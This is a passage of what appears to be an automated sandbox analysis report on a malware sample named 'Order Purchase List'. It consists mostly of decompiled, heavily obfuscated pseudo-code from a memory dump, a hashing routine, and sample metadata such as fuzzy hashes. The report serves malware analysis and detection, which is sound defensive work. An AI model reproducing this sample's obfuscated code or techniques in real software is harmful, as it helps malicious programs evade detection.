                                      							asm("adc [0x88d35e93], eax");
                                      							__ecx = __ecx ^ 0x160a1efe;
                                      							__eflags = __ecx;
                                      							L1();
                                      							asm("adc esp, [0x2e65e2e8]");
                                      							asm("sbb [0x5d5b5c2b], ecx");
                                      							if(__ecx < 0) {
                                      								 *0x67bf0b71 =  *0x67bf0b71 | __edx;
                                      								 *0x71436a64 = __edi;
                                      								__dl = __dl &  *0xf434ac3a;
                                      								 *0x960a08f0 = __eax;
                                      								_pop(__esp);
                                      								__eflags = __ch -  *0x521dc612;
                                      								asm("sbb ch, 0xb1");
                                      								 *0xb7d48611 =  *0xb7d48611 >> 0xdd;
                                      								_t52 = __ah;
                                      								__ah =  *0xb6edad28;
                                      								 *0xb6edad28 = _t52;
                                      								__eflags =  *0xc8ec031 & __edi;
                                      								asm("lodsd");
                                      								if(( *0xc8ec031 & __edi) < 0) {
                                      									 *0xded5d07d * 0x143c =  *0xded5d07d * 0x143c - 1;
                                      									asm("adc cl, 0x38");
                                      									__eflags =  *0x1886bde0 & __dh;
                                      									_t57 = __esi;
                                      									__esi =  *0xd998e9d;
                                      									 *0xd998e9d = _t57;
                                      									__eflags = __ch & 0x00000032;
                                      									asm("sbb ah, [0x3b5354b2]");
                                      									__esi =  *0x2d3cdd6b * 0x127f;
                                      									_t60 = __esp;
                                      									__esp =  *0xa00c4903;
                                      									 *0xa00c4903 = _t60;
                                      									asm("rcl byte [0x8a8ef084], 0xeb");
                                      									 *0x54e32189 =  *0x54e32189 << 0x1e;
                                      									asm("sbb esp, [0x99838235]");
                                      									 *0xe80bd1f1 =  *0xe80bd1f1 - __ebp;
                                      									_pop(__esp);
                                      									_push(0xeda4f927);
                                      									asm("sbb edi, [0xe1381fed]");
                                      									__esp =  *0xa00c4903 -  *0x92d506f0;
                                      									__esp =  *0xa00c4903 -  *0x92d506f0 - 1;
                                      									_push( *0xc901715);
                                      									__ecx = __ecx +  *0x6fe557a3;
                                      									__eflags = __ecx;
                                      									asm("sbb ebp, 0xc16ef911");
                                      									if(__ecx < 0) {
                                      										__eflags = __esi -  *0x4e96e071;
                                      										 *0x3a78ab07 =  *0x3a78ab07 + __esi;
                                      										__eflags =  *0x3a78ab07;
                                      										if( *0x3a78ab07 == 0) {
                                      											__ebx = 0xb00309;
                                      											asm("ror dword [0x44172816], 0x9c");
                                      											__edi = __edi +  *0xacea85ba;
                                      											__al = __al | 0x0000002a;
                                      											 *0xb28d76c6 =  *0xb28d76c6 >> 0xf4;
                                      											__ecx = __ecx ^  *0x1b9de127;
                                      											__eflags = __ecx;
                                      											if(__ecx <= 0) {
                                      												__edx =  *0x8ac1547f * 0x1fb5;
                                      												__ebx =  *0x99ae1a11;
                                      												 *0x99ae1a11 = 0xb00309;
                                      												__eax = __eax &  *0xc13e2295;
                                      												L1();
                                      												__esi & 0x0466a2e8 =  *0x98fdfd0f &  *0x99ae1a11;
                                      												__ebx = 0x81c3c9b;
                                      												__ebx =  *0x90d8540f;
                                      												 *0x90d8540f = 0x81c3c9b;
                                      												__bl = __bl -  *0x5c41cb4;
                                      												L1();
                                      												__ecx = __ecx ^  *0xc3f0d0e8;
                                      												asm("adc dh, 0x86");
                                      												asm("sbb [0x593c59ea], edx");
                                      												_push(__edi);
                                      												__eflags = __bl - 0x86;
                                      												if(__bl >= 0x86) {
                                      													__esi =  *0x9be1be7c * 0x5316;
                                      													asm("sbb [0x761003e1], dh");
                                      													 *0xe76a2d3 =  *0xe76a2d3 << 0xac;
                                      													__esi =  *0x9be1be7c * 0x5316 - 1;
                                      													asm("sbb dh, 0x63");
                                      													_pop(__ecx);
                                      													__ah = __ah | 0x000000a2;
                                      													 *0xd33c9e2f =  *0xd33c9e2f + __esp;
                                      													__esi =  *0x9be1be7c * 0x00005316 - 0x00000001 ^ 0x2203953e;
                                      													__esp = __esp - 1;
                                      													__edi = __edi -  *0x3a8a2693;
                                      													_push( *0x9d5480ba);
                                      													asm("rol byte [0xd704e43a], 0xe");
                                      													__eflags = __ebp - 0x5278ef09;
                                      													asm("cmpsb");
                                      													__ebp = __ebp |  *0x3b46e3f0;
                                      													__esi =  *0x83a192c0;
                                      													 *0x83a192c0 =  *0x9be1be7c * 0x00005316 - 0x00000001 ^ 0x2203953e;
                                      													 *0xd84f9ce5 =  *0xd84f9ce5 ^ __al;
                                      													asm("rcl dword [0xf38380d6], 0xa");
                                      													 *0x52d56634 = __ah;
                                      													__eflags =  *0x23e0388 & __dh;
                                      													if(( *0x23e0388 & __dh) < 0) {
                                      														__edx = __edx +  *0xd0142071;
                                      														asm("rcl byte [0x4e268763], 0xe");
                                      														__al = 0xf9;
                                      														asm("rcr dword [0x851a9dbb], 0xfc");
                                      														asm("sbb bh, [0xa1fd9a30]");
                                      														__eflags = __edx & 0x4ac34fcc;
                                      														__ecx = __ecx ^ 0xb3ab60d5;
                                      														__al =  *0x86cdbcf6;
                                      														__esp = __esp + 1;
                                      														 *0x30456919 =  *0x30456919 >> 0xa2;
                                      														_push(__ecx);
                                      														 *0xe57b58cb =  *0xe57b58cb ^ __esi;
                                      														__edx = __edx + 0x4efcacde;
                                      														__eax = __eax + 1;
                                      														__eflags =  *0x1c9a0e0a & __ah;
                                      														 *0x26582de =  *0x26582de - __esi;
                                      														asm("ror dword [0x2afef709], 0xb5");
                                      														__esi =  *0x97b5abc2;
                                      														__eflags = __edx & 0xdd447711;
                                      														L1();
                                      														__eflags = __esp -  *0xab3dcde8;
                                      														asm("adc ebp, [0x764b52bb]");
                                      														__eflags = __bl -  *0xfd8b1910;
                                      														asm("movsb");
                                      														 *0x5b2c193c =  *0x5b2c193c | __al;
                                      														_t76 = __al;
                                      														__al =  *0xe574b2b2;
                                      														 *0xe574b2b2 = _t76;
                                      														_t77 = __ebx;
                                      														__ebx =  *0x13ebfd25;
                                      														 *0x13ebfd25 = _t77;
                                      														 *0x40a692ff =  *0x40a692ff | __esp;
                                      														asm("sbb ebx, [0x11810c9f]");
                                      														__eflags = __esp & 0x2ef5eebc;
                                      														asm("adc edi, [0x29bfe88f]");
                                      														 *0x326aeb04 =  *0x326aeb04 << 0xdd;
                                      														 *0x6d1d6514 =  *0x6d1d6514 >> 0xd4;
                                      														__ecx = __ecx + 0x8bfcbebb;
                                      														asm("adc [0x81d33d2a], ah");
                                      														_t80 = __eax;
                                      														__eax =  *0x68a4a16f;
                                      														 *0x68a4a16f = _t80;
                                      														__bh = __bh & 0x000000b5;
                                      														__esi =  *0x97b5abc2 -  *0x5f73161e;
                                      														__eflags = __esi;
                                      														if(__esi == 0) {
                                      															 *0x6f212e7a =  *0x6f212e7a ^ __edx;
                                      															asm("rol byte [0x926b2eb2], 0x15");
                                      															 *0xc065cc25 =  *0xc065cc25 << 0x94;
                                      															__cl = __cl | 0x000000d7;
                                      															_t81 = __esi;
                                      															__esi =  *0x8d0171e;
                                      															 *0x8d0171e = _t81;
                                      															__eflags =  *0x69dc008f & __edx;
                                      															__eax = 0xb1591ade;
                                      															asm("adc edi, [0xbae8f519]");
                                      															 *0x60ddb708 =  *0x60ddb708 << 0xd9;
                                      															__edx = __edx & 0xf3d45cd8;
                                      															 *0xc0b06586 =  *0xc0b06586 | __bh;
                                      															__cl = __cl +  *0xc0546304;
                                      															__eflags = __cl;
                                      															__dl = 0x20;
                                      															asm("adc [0xd2b5481d], ebx");
                                      															__edi = 0xb2c50bbf;
                                      															if(__cl <= 0) {
                                      																__eax =  *0xac6cc17f * 0x5eec;
                                      																asm("rcr byte [0x14f0e42a], 0xf5");
                                      																asm("movsb");
                                      																asm("sbb ecx, [0x79ce1331]");
                                      																 *0x6e7e2cf5 = __esp;
                                      																asm("adc [0xfc512d21], esp");
                                      																__ecx = __ecx + 0x98acc899;
                                      																__dh = 4;
                                      																asm("adc esp, [0x25137f3b]");
                                      																asm("cmpsw");
                                      																_pop( *0xfea5087);
                                      																__edx = __edx - 1;
                                      																asm("rcr dword [0x99fe4129], 0xe1");
                                      																__eflags = __al - 0xb5;
                                      																asm("adc ecx, [0xe321c8e]");
                                      																asm("rol dword [0xd4a5081], 0x5f");
                                      																asm("movsb");
                                      																if(__al < 0xb5) {
                                      																	__eflags = __ebp & 0x36c43673;
                                      																	if((__ebp & 0x36c43673) != 0) {
                                      																		asm("ror dword [0x5894a474], 0x4e");
                                      																		asm("adc [0x8d3d193c], cl");
                                      																		__esi = __esi |  *0x95c95317;
                                      																		__ch = __ch | 0x0000002a;
                                      																		__ebp & 0x6878009e = __al & 0x000000b3;
                                      																		if((__al & 0x000000b3) > 0) {
                                      																			__esp =  *0x4664bf7e * 0x8b89;
                                      																			__edi = 0xffffffff82400b99;
                                      																			asm("adc ch, 0x3c");
                                      																			asm("movsb");
                                      																			__esp =  *0x4664bf7e * 0x8b89 -  *0x4a0dc6fe;
                                      																			__eax = __eax + 1;
                                      																			__al = __al ^  *0xa8277424;
                                      																			asm("movsb");
                                      																			 *0x193c5807 =  *0x193c5807 | 0xb2c50bbf;
                                      																			__eflags = __esp - 0xa9098d3d;
                                      																			if(__esp <= 0xa9098d3d) {
                                      																				__eflags = __esi - 0x2d707077;
                                      																				__ah = __ah ^  *0x1e019412;
                                      																				asm("sbb ebx, 0xbc04c50f");
                                      																				__eflags = __bh -  *0x87c98cf6;
                                      																				asm("adc esp, [0xc25791ee]");
                                      																				__edx -  *0xa03af811 =  *0xa3bfa12 & 0x00000020;
                                      																				__eax = __eax + 1;
                                      																				__esp =  *0xba2fec8;
                                      																				 *0x52b485bf =  *0x52b485bf | __ebp;
                                      																				_pop(__ebx);
                                      																				asm("rcr dword [0xe89c0899], 0x3f");
                                      																				__ecx = __ecx + 0xa9e60bd1;
                                      																				__eflags = __ebx;
                                      																				__ebx =  *0x494d21bc;
                                      																				if(__eflags >= 0) {
                                      																					__eflags = __ecx & 0xf0fc6f70;
                                      																					 *0x8cc5781b =  *0x8cc5781b << 7;
                                      																					_t94 = __esp;
                                      																					__esp =  *0x9e270996;
                                      																					 *0x9e270996 = _t94;
                                      																					__eax = __eax &  *0xcb60b296;
                                      																					__edi =  *0x31abb9c7;
                                      																					 *0x31abb9c7 = 0xffffffff82400b99;
                                      																					 *0x3dfeb2c7 =  *0x3dfeb2c7 >> 0x49;
                                      																					__edi =  *0x31abb9c7 |  *0xf2ae5623;
                                      																					 *0xd17d4e66 & __edx =  *0xd7f0f70d - __ebx;
                                      																					__dh = 0x30;
                                      																					__eflags = __esp - 0x8bb0ddf;
                                      																					_pop(__eax);
                                      																					asm("rcr byte [0x8d3d193c], 0xbc");
                                      																					__ebx = __ebx |  *0x37221419;
                                      																					 *0xdf0185b4 =  *0xdf0185b4 >> 0x10;
                                      																					_pop(__esp);
                                      																					 *0x94f9cc09 =  *0x94f9cc09 & __ebp;
                                      																					 *0x764b3da8 =  *0x764b3da8 - 4;
                                      																					asm("sbb esi, [0x1fcb1adb]");
                                      																					__edi = ( *0x31abb9c7 |  *0xf2ae5623) & 0xd2b5481d;
                                      																					asm("sbb [0xd0480ebf], edi");
                                      																					 *0x836aa5d0 =  *0x836aa5d0 | __bl;
                                      																					 *0xaf9e8fea = __ecx;
                                      																					__dl = 0x20 -  *0x970ef5e7;
                                      																					_push( *0xdb93410b);
                                      																					__esi = __esi + 1;
                                      																					_push(__ebp);
                                      																					__esi =  *0x6f704913;
                                      																					asm("ror dword [0xca0bf0fc], 0xda");
                                      																					__ebp = __ebp +  *0x638773c4;
                                      																					__eflags = __esi -  *0x6f704917;
                                      																					asm("adc eax, [0x10bf0fc]");
                                      																					__dl = 0x20 -  *0x970ef5e7 + 8;
                                      																					__eflags = __al -  *0x4c12a022;
                                      																					__ecx = __ecx - 1;
                                      																					__eflags = __ecx;
                                      																					if(__ecx >= 0) {
                                      																						__eflags =  *0xf0fc6f70 & __edi;
                                      																						__dl = __dl +  *0x2322770a;
                                      																						asm("sbb eax, [0x3fb0b70e]");
                                      																						asm("sbb [0xb714686], ch");
                                      																						_push( *0x24b9cbd6);
                                      																						asm("rol byte [0x21f1f6a2], 0xc7");
                                      																						__ebp = 0x14f0e53d;
                                      																						__eflags = __edi -  *0x6f0e79b9;
                                      																						asm("adc ebx, 0xc2469d37");
                                      																						__edx = __edx + 1;
                                      																						asm("sbb ecx, 0x7185f6cc");
                                      																						__esi = __esi &  *0xa379c4c8;
                                      																						__ch = __ch - 0xe4;
                                      																						__ebp = 0x14f0e53d ^  *0x3f137f25;
                                      																						__eflags = 0x14f0e53d;
                                      																						if(0x14f0e53d >= 0) {
                                      																							__ebp =  *0x1273337c * 0x1757;
                                      																							__eflags = __ebp;
                                      																							if(__ebp >= 0) {
                                      																								 *0xf69ef572 =  *0xf69ef572 >> 0x55;
                                      																								asm("sbb [0x8739b2f1], ebx");
                                      																								__bl = __bl ^ 0x00000018;
                                      																								asm("sbb ecx, [0xa4a48fe]");
                                      																								_push( *0xe8b919c);
                                      																								__esi = __esi |  *0xc05024f3;
                                      																								__eflags = __esi;
                                      																								_push(__ebp);
                                      																								if(__esi < 0) {
                                      																									 *0x62321871 =  *0x62321871 >> 0x22;
                                      																									__ebp = __ebp +  *0x1fee4e16;
                                      																									__dh = 0x30 -  *0x84de3ec9;
                                      																									asm("adc edi, [0x2488dda3]");
                                      																									__eax = __eax + 1;
                                      																									__eflags = __ecx -  *0xff14de64;
                                      																									__esp = __esp + 0x1d1eda13;
                                      																									_t100 = __eax;
                                      																									__eax =  *0x53241939;
                                      																									 *0x53241939 = _t100;
                                      																									 *0x9d53afe =  *0x9d53afe << 0x9f;
                                      																									asm("adc bl, [0x4dab24b1]");
                                      																									 *0xb8a70d97 =  *0xb8a70d97 +  *0x53241939;
                                      																									_push(__edx);
                                      																									__edx = __edx |  *0xbb32ff06;
                                      																									__eflags =  *0xb5481d32 & __bh;
                                      																									__bh = 0xd2;
                                      																									asm("adc ebp, 0xd43e11bf");
                                      																									asm("adc [0x7e54edeb], ebp");
                                      																									__ebp = __ebp + 1;
                                      																									asm("adc esi, 0x82f34116");
                                      																									 *0x3db25f8c = __esi;
                                      																									 *0xbb0c3ce6 =  *0xbb0c3ce6 << 0x91;
                                      																								}
                                      																							}
                                      																						}
                                      																					}
                                      																				}
                                      																			}
                                      																		}
                                      																	}
                                      																}
                                      															}
                                      														}
                                      													}
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				L1:
                                      				_pop( *0x2a529409);
                                      				_t109 = _t109 + 0x78c1d903;
                                      				_t113 = _t113 -  *0x550d1e30;
                                      				_push(_t129);
                                      				asm("sbb bl, 0xd0");
                                      				asm("adc [0x5e9ea6c9], bl");
                                      				_t105 = _t105 &  *0xee0c8d29;
                                      				asm("adc ebx, [0x311d046c]");
                                      				asm("sbb ecx, 0xc989e08c");
                                      				asm("lodsd");
                                      				_push(_t109);
                                      				_t129 = _t129 - 1;
                                      				asm("rcl byte [0x3fbd9008], 0xe");
                                      				_t132 = _t132 - 1;
                                      				_t123 = _t123 - 0xb1242c2e;
                                      				if((_t103 & 0x1ab4b105) < 0) {
                                      					asm("sbb [0xed0dd771], edx");
                                      					 *0x98a9087 =  *0x98a9087 - _t132;
                                      					asm("adc ecx, [0xd3d3b435]");
                                      					if( *0x98a9087 <= 0) {
                                      						asm("adc [0x8d574f77], ebx");
                                      						_pop(_t129);
                                      						_push( *0x74104a36);
                                      						asm("lodsd");
                                      						_t137 = _t137 ^ 0x79383833;
                                      						asm("rcr dword [0xc5d262bf], 0x61");
                                      						asm("rol dword [0x640a03eb], 0x1e");
                                      						asm("sbb ebp, [0x76fe1429]");
                                      						asm("sbb bl, [0x711e2f82]");
                                      						_push( *0x53b27e09);
                                      						_t105 = 0x287ca813 -  *0x99051ecf;
                                      						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
                                      						_t109 = 0xa;
                                      						_t113 = ((_t113 |  *0x3fb272eb) &  *0xe555ddf2) +  *0xaf2e830b;
                                      						asm("rol byte [0xb64a5934], 0x33");
                                      						_t123 = _t123;
                                      						if(_t123 < 0) {
                                      							asm("sbb edx, [0x6aaf0a71]");
                                      							_push(0x811d5329);
                                      							_t132 = _t132 - 1;
                                      							_t129 = _t129 - 1;
                                      							if(_t129 < 0) {
                                      								_t113 = _t113 ^  *0x11030f71;
                                      								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
                                      								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
                                      								_t105 = _t105 + 0xa0;
                                      								asm("rol byte [0x50590312], 0x7d");
                                      								asm("sbb dh, [0x5305c024]");
                                      								_t103 = _t103 & 0x799f3c83;
                                      								_pop(_t125);
                                      								_pop( *0xfdc51691);
                                      								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
                                      								asm("sbb [0x8a15626c], eax");
                                      								_t123 = _t125 + 1;
                                      								_t109 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
                                      								if(_t109 < 0) {
                                      									asm("stosb");
                                      									asm("rcl byte [0x33670730], 0x95");
                                      									 *0x614bdadb =  *0x614bdadb | _t129;
                                      									_t132 = 0x8200a671;
                                      									if( *0x614bdadb <= 0) {
                                      										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
                                      										asm("adc edx, [0xe73ac826]");
                                      										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
                                      										 *0xbd0901df =  *0xbd0901df >> 0x97;
                                      										_t139 = _t137 - 1 +  *0x9c9eb206;
                                      										_pop(_t126);
                                      										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t103;
                                      										 *0xe82cce68 =  *0xe82cce68 ^ _t132;
                                      										 *0xe3cd41ea = _t103;
                                      										_t109 = _t109 + 1;
                                      										 *0x1f4f8938 =  *0x1f4f8938 ^ _t109;
                                      										asm("rcr dword [0x3cb441f3], 0xf1");
                                      										_t123 = (_t126 - 0x00000001 |  *0xaa92b917) &  *0x48242bde;
                                      										asm("adc [0x704bccc9], cl");
                                      										 *0xec116eb6 = _t103 -  *0x4c2f0d80;
                                      										_t105 =  *0x38028e97;
                                      										_t103 =  *0xad2fb260 * 0x81d;
                                      										_push(_t139);
                                      										 *0xfe811d01 = _t132 ^ 0xca1c871b;
                                      										asm("movsw");
                                      										_t137 =  *0x312dedfd;
                                      										 *0x312dedfd = _t139;
                                      										_t129 = _t129 + 1;
                                      										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
                                      										_t121 =  *0xd4d909d1;
                                      										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
                                      										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
                                      										 *0xf202931b =  *0xf202931b - _t121;
                                      										_t113 = _t121 ^ 0x000000e6;
                                      										_t132 =  *0x96049ebe;
                                      										asm("adc ecx, [0x890ef031]");
                                      										 *0xef5459e5 =  *0xef5459e5 ^ _t103;
                                      										asm("sbb eax, 0x486a0e97");
                                      										 *0xe78fc910 =  *0xe78fc910 - _t105;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				goto L1;
                                      			}
















                                      0x0041c3b3
                                      0x0041c3b9
                                      0x0041c3b9
                                      0x0041c3ba
                                      0x0041c3c0
                                      0x0041c3c6
                                      0x0041c3cc
                                      0x0041c3d2
                                      0x0041c3d8
                                      0x0041c3de
                                      0x0041c3e5
                                      0x0041c3eb
                                      0x0041c3f1
                                      0x0041c3f7
                                      0x0041c3f8
                                      0x0041c3fe
                                      0x0041c404
                                      0x0041c407
                                      0x0041c407
                                      0x0041c40d
                                      0x0041c413
                                      0x0041c413
                                      0x0041c41d
                                      0x0041c423
                                      0x0041c42a
                                      0x0041c430
                                      0x0041c433
                                      0x0041c439
                                      0x0041c43f
                                      0x0041c43f
                                      0x0041c445
                                      0x0041c446
                                      0x0041c44c
                                      0x0041c453
                                      0x0041c459
                                      0x0041c45f
                                      0x0041c465
                                      0x0041c466
                                      0x0041c46c
                                      0x0041c472
                                      0x0041c472
                                      0x0041c472
                                      0x0041c478
                                      0x0041c47f
                                      0x0041c485
                                      0x0041c48b
                                      0x0041c48c
                                      0x0041c492
                                      0x0041c498
                                      0x0041c49a
                                      0x0041c4a0
                                      0x0041c4a6
                                      0x0041c4a7
                                      0x0041c4ad
                                      0x0041c4b3
                                      0x0041c4b3
                                      0x0041c446
                                      0x0041c41d
                                      0x0041c40d
                                      0x0041c3ba
                                      0x0041c2fc
                                      0x0041c2aa
                                      0x0041c276
                                      0x0041c252
                                      0x0041c246
                                      0x0041c1ee
                                      0x0041c194
                                      0x0041c0c1
                                      0x0041c050
                                      0x0041bff9
                                      0x0041bfd1
                                      0x0041bfbf
                                      0x0041bf47
                                      0x0041bf0c
                                      0x0041bdc7
                                      0x0041bd28
                                      0x0041b8d6
                                      0x0041b8d6
                                      0x0041b8dc
                                      0x0041b8e2
                                      0x0041b8e8
                                      0x0041b8e9
                                      0x0041b8f2
                                      0x0041b8f8
                                      0x0041b8fe
                                      0x0041b904
                                      0x0041b90a
                                      0x0041b90b
                                      0x0041b90c
                                      0x0041b90d
                                      0x0041b914
                                      0x0041b915
                                      0x0041b920
                                      0x0041b922
                                      0x0041b928
                                      0x0041b92e
                                      0x0041b934
                                      0x0041b936
                                      0x0041b942
                                      0x0041b956
                                      0x0041b95c
                                      0x0041b95d
                                      0x0041b963
                                      0x0041b970
                                      0x0041b978
                                      0x0041b97e
                                      0x0041b984
                                      0x0041b990
                                      0x0041b996
                                      0x0041b99d
                                      0x0041b99f
                                      0x0041b9a5
                                      0x0041b9ac
                                      0x0041b9ad
                                      0x0041b9b3
                                      0x0041b9b9
                                      0x0041b9be
                                      0x0041b9c2
                                      0x0041b9c3
                                      0x0041b9c9
                                      0x0041b9cf
                                      0x0041b9d5
                                      0x0041b9e1
                                      0x0041b9e4
                                      0x0041b9eb
                                      0x0041b9f7
                                      0x0041ba02
                                      0x0041ba09
                                      0x0041ba15
                                      0x0041ba22
                                      0x0041ba28
                                      0x0041ba29
                                      0x0041ba2c
                                      0x0041ba37
                                      0x0041ba38
                                      0x0041ba3f
                                      0x0041ba45
                                      0x0041ba46
                                      0x0041ba5c
                                      0x0041ba63
                                      0x0041ba69
                                      0x0041ba6f
                                      0x0041ba76
                                      0x0041ba7c
                                      0x0041ba7d
                                      0x0041ba83
                                      0x0041ba89
                                      0x0041ba8f
                                      0x0041ba90
                                      0x0041baa2
                                      0x0041babc
                                      0x0041bace
                                      0x0041bad4
                                      0x0041bad9
                                      0x0041badf
                                      0x0041baec
                                      0x0041baf3
                                      0x0041baf9
                                      0x0041bafb
                                      0x0041bafb
                                      0x0041bb02
                                      0x0041bb0f
                                      0x0041bb16
                                      0x0041bb16
                                      0x0041bb22
                                      0x0041bb2f
                                      0x0041bb35
                                      0x0041bb3e
                                      0x0041bb4a
                                      0x0041bb5c
                                      0x0041bb62
                                      0x0041bb67
                                      0x0041bb6d
                                      0x0041ba46
                                      0x0041ba2c
                                      0x0041b9c3
                                      0x0041b9ad
                                      0x0041b934
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Wh;$xR$wpp-
                                      • API String ID: 0-1705525878
                                      • Opcode ID: 6c666c1fa6ac295a51c90b93466e6fa23fba3945e02348c155ed1dde0e1409e3
                                      • Instruction ID: c7626d7d8be2404d7d1ac6495aa1db854b920f805c25f5bdd5c53e20fd29778a
                                      • Opcode Fuzzy Hash: 6c666c1fa6ac295a51c90b93466e6fa23fba3945e02348c155ed1dde0e1409e3
                                      • Instruction Fuzzy Hash: 12428532908785CFDB06DF38C88AB913FB6F752724B08425FD5A193192E7382556CB89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 73%
                                      			E00408C90(signed int* _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				char _v304;
                                      				signed char* _t277;
                                      				signed int* _t278;
                                      				signed int _t279;
                                      				signed int _t285;
                                      				signed int _t288;
                                      				signed int _t292;
                                      				signed int _t295;
                                      				signed int _t299;
                                      				signed int _t303;
                                      				signed int _t305;
                                      				signed int _t311;
                                      				signed int _t318;
                                      				signed int _t320;
                                      				signed int _t323;
                                      				signed int _t325;
                                      				signed int _t334;
                                      				signed int _t340;
                                      				signed int _t341;
                                      				signed int _t346;
                                      				signed int _t353;
                                      				signed int _t357;
                                      				signed int _t358;
                                      				signed int _t362;
                                      				signed int _t365;
                                      				signed int _t369;
                                      				signed int _t370;
                                      				signed int _t399;
                                      				signed int _t404;
                                      				signed int _t410;
                                      				signed int _t413;
                                      				signed int _t420;
                                      				signed int _t423;
                                      				signed int _t432;
                                      				signed int _t434;
                                      				signed int _t437;
                                      				signed int _t445;
                                      				signed int _t459;
                                      				signed int _t462;
                                      				signed int _t463;
                                      				signed int _t464;
                                      				signed int _t470;
                                      				signed int _t478;
                                      				signed int _t479;
                                      				signed int* _t480;
                                      				signed int* _t481;
                                      				signed int _t488;
                                      				signed int _t491;
                                      				signed int _t496;
                                      				signed int _t499;
                                      				signed int _t502;
                                      				signed int _t505;
                                      				signed int _t506;
                                      				signed int _t510;
                                      				signed int _t522;
                                      				signed int _t525;
                                      				signed int _t532;
                                      				void* _t536;
                                      
                                      				_t481 = _a4;
                                      				_t353 = 0;
                                      				_t2 =  &(_t481[7]); // 0x1b
                                      				_t277 = _t2;
                                      				do {
                                      					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                      					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                      					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                      					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                      					_t353 = _t353 + 4;
                                      					_t277 =  &(_t277[0x10]);
                                      				} while (_t353 < 0x10);
                                      				_t278 =  &_v304;
                                      				_v8 = 0x10;
                                      				do {
                                      					_t399 =  *(_t278 - 0x18);
                                      					_t459 =  *(_t278 - 0x14);
                                      					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                      					asm("rol ecx, 1");
                                      					asm("rol ebx, 1");
                                      					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                      					_t278[8] = _t357;
                                      					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                      					_t278 =  &(_t278[4]);
                                      					asm("rol ebx, 1");
                                      					asm("rol edx, 1");
                                      					_t46 =  &_v8;
                                      					 *_t46 = _v8 - 1;
                                      					_t278[6] = _t318 ^ _t399;
                                      					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                      				} while ( *_t46 != 0);
                                      				_t320 =  *_t481;
                                      				_t279 = _t481[1];
                                      				_t358 = _t481[2];
                                      				_t404 = _t481[3];
                                      				_v12 = _t320;
                                      				_v16 = _t481[4];
                                      				_v8 = 0;
                                      				do {
                                      					asm("rol ebx, 0x5");
                                      					_t462 = _v8;
                                      					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                      					_t323 = _v12;
                                      					asm("ror eax, 0x2");
                                      					_v16 = _t404;
                                      					_v12 = _t488;
                                      					asm("rol esi, 0x5");
                                      					_v8 = _t358;
                                      					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                      					_t491 = _t279;
                                      					asm("ror ebx, 0x2");
                                      					_v16 = _v8;
                                      					_t362 = _v12;
                                      					_v8 = _t323;
                                      					_t325 = _v8;
                                      					_v12 = _t410;
                                      					asm("rol edx, 0x5");
                                      					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                      					_t413 = _v12;
                                      					_v16 = _t491;
                                      					asm("ror ecx, 0x2");
                                      					_v8 = _t362;
                                      					_v12 = _t285;
                                      					asm("rol eax, 0x5");
                                      					_v16 = _t325;
                                      					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                      					_t358 = _v12;
                                      					_t288 = _v8;
                                      					asm("ror edx, 0x2");
                                      					_v8 = _t413;
                                      					_v12 = _t496;
                                      					asm("rol esi, 0x5");
                                      					_v16 = _t288;
                                      					_t279 = _v12;
                                      					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                      					_t404 = _v8;
                                      					asm("ror ecx, 0x2");
                                      					_t463 = _t462 + 5;
                                      					_t320 = _t499;
                                      					_v12 = _t320;
                                      					_v8 = _t463;
